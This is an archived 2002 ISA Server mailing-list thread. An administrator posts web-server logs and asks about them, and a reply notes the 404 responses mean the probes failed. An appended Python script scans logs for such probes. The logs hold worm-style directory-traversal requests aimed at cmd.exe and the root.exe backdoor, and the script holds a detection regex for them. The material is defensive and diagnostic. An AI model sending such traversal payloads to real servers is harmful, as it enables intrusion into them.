RE: !!!!URGENT - SCARY website LOGS!!!!

  • From: "Joseph" <cismic@xxxxxxx>
  • To: "'[ISAserver.org Discussion List]'" <isalist@xxxxxxxxxxxxx>
  • Date: Tue, 26 Mar 2002 23:21:57 -0800

It is not always a good idea to keep ISA on the same machine with all
the other applications that you mentioned.  
The 404 error code says that you're OK, meaning URL not found.

Joseph

-----Original Message-----
From: Sushil Bhalla [mailto:sushilb@xxxxxxxxxxxxxxxxx] 
Sent: Tuesday, March 26, 2002 10:07 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] !!!!URGENT - SCARY website LOGS!!!!


Hello All,

I have W2K, E2K, ISA2K, ISM all installed on one server.

Recently I have allowed inbound HTTPServer Inbound (port 80) connection
(through ISA PACKET FILTERING) to allow my website to be viewed and after
going through my website logs, I got very worried.

Following is what I am getting in my logs every few hours.

Can someone tell me URGENTLY what kind of requests are these? Should I be
worried? What can I do to prevent these?

Thanks in advance for any help.

Sushil Bhalla

#Date: 2002-03-27 00:19:03
#Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes cs-bytes time-taken cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer)
2002-03-27 00:19:03 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/root.exe /c+dir 404 3 3396 72 15 HTTP/1.0 www - - -
2002-03-27 00:19:04 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /MSADC/root.exe /c+dir 404 3 3396 70 0 HTTP/1.0 www - - -
2002-03-27 00:19:09 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /c/winnt/system32/cmd.exe /c+dir 404 3 3396 80 0 HTTP/1.0 www - - -
2002-03-27 00:19:10 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /d/winnt/system32/cmd.exe /c+dir 404 3 3396 80 16 HTTP/1.0 www - - -
2002-03-27 00:19:11 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 96 16 HTTP/1.0 www - - -
2002-03-27 00:19:14 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 117 0 HTTP/1.0 www - - -
2002-03-27 00:19:19 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 117 0 HTTP/1.0 www - - -
2002-03-27 00:19:20 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 404 3 3396 145 0 HTTP/1.0 www - - -
2002-03-27 00:19:22 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 HTTP/1.0 www - - -
2002-03-27 00:19:23 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 3 3396 97 15 HTTP/1.0 www - - -
2002-03-27 00:19:25 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 HTTP/1.0 www - - -
2002-03-27 00:19:27 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /winnt/system32/cmd.exe /c+dir 404 3 3396 97 16 HTTP/1.0 www - - -
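
Added example, not part of the original messages: one way to triage a log like the one above is to pull out every request for cmd.exe or root.exe (or containing a directory-traversal step) and check whether any of them received a status other than 4xx. The sample log, its shortened field list, the %255c variant and the 192.0.2.x / 198.51.100.x addresses are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the same W3C extended format as the log above
# (field list shortened; addresses are documentation-range placeholders).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-03-27 00:19:03 192.0.2.10 GET /scripts/root.exe /c+dir 404
2002-03-27 00:19:11 192.0.2.10 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404
2002-03-27 00:19:14 192.0.2.10 GET /_vti_bin/..%255c../winnt/system32/cmd.exe /c+dir 200
2002-03-27 00:20:00 198.51.100.7 GET /default.htm - 200
2002-03-27 00:21:00 198.51.100.7 GET /images/logo.gif - 304
"""

# Command interpreter names requested over HTTP, or a "../" / "..\" step
# written literally, percent-encoded, or double-encoded (%255c).
PROBE = re.compile(r"(?:cmd|root)\.exe|\.\.(?:/|\\|%(?:25)?(?:2f|5c))", re.I)

def scan(log_text):
    """Return {client_ip: {"probes": n, "answered": [(time, uri, status)]}}."""
    fields, report = [], defaultdict(lambda: {"probes": 0, "answered": []})
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]       # column order can change mid-file
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        uri = row.get("cs-uri-stem", "")
        if not PROBE.search(uri):
            continue
        entry = report[row.get("c-ip", "?")]
        entry["probes"] += 1
        status = row.get("sc-status", "")
        # A 4xx status means the request was rejected; any other status
        # on a probe URI is worth investigating.
        if not status.startswith("4"):
            entry["answered"].append((row.get("time"), uri, status))
    return dict(report)

if __name__ == "__main__":
    for ip, entry in scan(SAMPLE_LOG).items():
        print(ip, "probes:", entry["probes"], "answered:", entry["answered"])
```

An empty "answered" list for a client, as would be the case for the all-404 log posted above, means none of its probes was served.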
